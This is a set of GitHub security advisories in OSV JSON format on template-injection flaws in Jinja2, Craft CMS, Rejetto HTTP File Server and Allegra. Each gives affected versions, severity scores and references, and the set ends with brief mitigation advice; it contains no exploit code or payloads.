Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.5"
},
"package": {
"ecosystem": "PyPI",
"name": "Jinja2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27516"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-05T20:40:14Z",
"nvd_published_at": "2025-03-05T21:15:20Z",
"severity": "MODERATE"
},
"details": "An oversight in how the Jinja sandboxed environment interacts with the `|attr` filter allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja\u0027s sandbox does catch calls to `str.format` and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to use the `|attr` filter to get a reference to a string\u0027s plain format method, bypassing the sandbox. After the fix, the `|attr` filter no longer bypasses the environment\u0027s attribute lookup.",
"id": "GHSA-cpwx-vrp4-4pq7",
"modified": "2025-11-03T22:54:41Z",
"published": "2025-03-05T20:40:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27516"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/jinja"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00045.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Jinja2 vulnerable to sandbox breakout through attr filter selecting format method"
}
GHSA-CRCQ-738G-PQVC
Vulnerability from github – Published: 2025-08-25 20:42 – Updated: 2025-11-27 07:57Note that users must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled for this to work, which is against Craft CMS' recommendations for any non-dev environment.
https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production
Note: This is a follow-up to GHSA-f3cw-hg6r-chfv
Users should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.
Resources: https://github.com/craftcms/cms/pull/17612
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.16.5"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.16.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.8.6"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.8.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-57811"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-22",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-25T20:42:45Z",
"nvd_published_at": "2025-08-25T18:15:31Z",
"severity": "MODERATE"
},
"details": "Note that users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled for this to work, which is against Craft CMS\u0027 recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to [GHSA-f3cw-hg6r-chfv](https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv)\n\nUsers should update to the patched versions (4.16.6 and 5.8.7) to mitigate the issue.\n\nResources: https://github.com/craftcms/cms/pull/17612",
"id": "GHSA-crcq-738g-pqvc",
"modified": "2025-11-27T07:57:45Z",
"published": "2025-08-25T20:42:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-crcq-738g-pqvc"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57811"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/pull/17612"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/e77f8a287dcdda41f1724f525d03542f18566cbc"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS Potential Remote Code Execution via Twig SSTI"
}
GHSA-CW5C-XM7F-WX63
Vulnerability from github – Published: 2024-05-31 12:30 – Updated: 2025-10-22 00:33Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
{
"affected": [],
"aliases": [
"CVE-2024-23692"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-31T10:15:09Z",
"severity": "CRITICAL"
},
"details": "Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.",
"id": "GHSA-cw5c-xm7f-wx63",
"modified": "2025-10-22T00:33:03Z",
"published": "2024-05-31T12:30:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23692"
},
{
"type": "WEB",
"url": "https://github.com/rapid7/metasploit-framework/pull/19240"
},
{
"type": "WEB",
"url": "https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce"
},
{
"type": "WEB",
"url": "https://vulncheck.com/advisories/rejetto-unauth-rce"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23692"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2024-23692-detect-rejetto-hfs-vulnerability"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2024-23692-rejetto-hfs-mitigate-vulnerability"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/unauthenticated-rce-flaw-in-rejetto-http-file-server-cve-2024-23692"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CWGV-JWGM-R5F5
Vulnerability from github – Published: 2024-11-22 21:32 – Updated: 2024-11-22 21:32Allegra getLinkText Server-Side Template Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability.
The specific flaw exists within the implementation of getLinkText method. The issue results from the lack of proper validation of a user-supplied string before processing it with the template engine. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23609.
{
"affected": [],
"aliases": [
"CVE-2024-30372"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-22T20:15:08Z",
"severity": "HIGH"
},
"details": "Allegra getLinkText Server-Side Template Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of getLinkText method. The issue results from the lack of proper validation of a user-supplied string before processing it with the template engine. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-23609.",
"id": "GHSA-cwgv-jwgm-r5f5",
"modified": "2024-11-22T21:32:16Z",
"published": "2024-11-22T21:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30372"
},
{
"type": "WEB",
"url": "https://alltena.com/en/resources/release-notes/relnotes-7-5-2"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-1165"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands.
Mitigation
Use the template engine's sandbox or restricted mode, if available.
No CAPEC attack patterns related to this CWE.